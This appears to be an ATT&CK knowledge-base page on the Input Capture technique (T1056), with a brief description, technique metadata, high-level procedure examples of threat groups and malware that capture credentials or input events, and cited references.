Skip to content

T1056 Input Capture

Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture).

Item Value
ID T1056
Sub-techniques T1056.001, T1056.002, T1056.003, T1056.004
Tactics TA0009, TA0006
Platforms Linux, Network Devices, Windows, macOS
Version 1.4
Created 31 May 2017
Last Modified 24 October 2025

Procedure Examples

ID Name Description
G0087 APT39 APT39 has utilized tools to capture mouse movements.11
G1044 APT42 APT42 has used credential harvesting websites.9
S0631 Chaes Chaes has a module to perform any API hooking it desires.5
S0381 FlawedAmmyy FlawedAmmyy can collect mouse events.6
S1245 InvisibleFerret InvisibleFerret has collected mouse and keyboard events using “pyWinhook”.3
S0641 Kobalos Kobalos has used a compromised SSH client to capture the hostname, port, username and password used to establish an SSH connection from the compromised host.78
C0049 Leviathan Australian Intrusions Leviathan captured submitted multfactor authentication codes and other technical artifacts related to remote access sessions during Leviathan Australian Intrusions.13
S1060 Mafalda Mafalda can conduct mouse event logging.4
S1059 metaMain metaMain can log mouse events.4
S1131 NPPSPY NPPSPY captures user input into the Winlogon process by redirecting RPC traffic from legitimate listening DLLs within the operating system to a newly registered malicious item that allows for recording logon information in cleartext.2
G1046 Storm-1811 Storm-1811 has used a PowerShell script to capture user credentials after prompting a user to authenticate to run a malicious script masquerading as a legitimate update item.10
C0039 Versa Director Zero Day Exploitation Versa Director Zero Day Exploitation intercepted and harvested credentials from user logins to compromised devices.12

References

  1. Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016. 

  2. Dray Agha. (2022, August 16). Cleartext Shenanigans: Gifting User Passwords to Adversaries With NPPSPY. Retrieved May 17, 2024. 

  3. Unit 42. (2023, November 21). Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors. Retrieved October 17, 2025. 

  4. SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023. 

  5. Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021. 

  6. Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022. 

  7. M.Leveille, M., Sanmillan, I. (2021, February 2). Kobalos – A complex Linux threat to high performance computing infrastructure. Retrieved August 24, 2021. 

  8. M.Leveille, M., Sanmillan, I. (2021, January). A WILD KOBALOS APPEARS Tricksy Linux malware goes after HPCs. Retrieved August 24, 2021. 

  9. Rozmann, O., et al. (2024, May 1). Uncharmed: Untangling Iran’s APT42 Operations. Retrieved October 9, 2024. 

  10. Tyler McGraw, Thomas Elkins, and Evan McCann. (2024, May 10). Ongoing Social Engineering Campaign Linked to Black Basta Ransomware Operators. Retrieved January 31, 2025. 

  11. FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020. 

  12. Black Lotus Labs. (2024, August 27). Taking The Crossroads: The Versa Director Zero-Day Exploitaiton. Retrieved August 27, 2024. 

  13. CISA et al. (2024, July 8). People’s Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action. Retrieved February 3, 2025.